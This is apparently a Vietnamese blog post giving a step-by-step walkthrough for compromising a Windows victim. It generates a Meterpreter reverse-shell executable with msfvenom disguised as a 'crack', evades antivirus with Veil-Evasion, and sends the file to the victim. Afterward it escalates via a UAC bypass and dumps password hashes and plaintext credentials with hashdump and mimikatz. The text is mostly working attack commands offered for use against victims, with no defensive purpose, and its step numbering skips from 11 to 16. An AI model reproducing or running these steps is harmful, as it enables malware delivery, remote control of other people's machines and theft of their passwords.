1.
msfvenom -p windows/meterpreter/reverse_tcp LHOST="ip attracker" LPORT="port lắng nghe" -f exe > /root/Desktop/crack.exe
2. download veil-Evasion
về, sau đó chạy nó lên. cái này để bypass AV.
3. list để xem danh sách
các kiểu khai thác
4. use 14 để chọn native/backdoor_factory.
5. thực hiện các lệnh
sau:
set LHOST “ip attracker”
set LPORT “cổng lắng nghe”
set orig_exe /root/Desktop/crack.exe
generate
6. nhấn enter sẽ thấy một
số file được tạo ra dạng như thế này:
7. copy file payload.exe
ra khỏi màn hình, sau đó mở metasploit
8.
use exploit/multi/handler
Set PAYLOAD windows/meterpreter/reverse_tcp
Set LHOST “ip attracker”
Set LPORT “cổng lắng nghe”
Exploit
9. gửi file payload.exe
cho nạn nhân, khi nó chạy thì mình khai thác thành công.
10. hashdump
11. background
use exploit windows/local/bypassuac_injection
set SESSION 1
set LHOST “ip attracker”
exploit
16. đến đây thì đã xong,
nhưng có cái mimikatz này lạ lạ,
17. load mimikatz
18. help mimikatz để xem
hướng dẫn
19. thử 1 cái xem
msv
Hiện ra được tất cả các
tài khoản có cả password của máy nạn nhân, nhưng ở dạng hash LM hoặc NTLM, giờ
thì chỉ việc giải mã hash đó là xong.
Hoặc dùng lệnh
kerberos
để
hiển thị luôn password.
Không có nhận xét nào:
Đăng nhận xét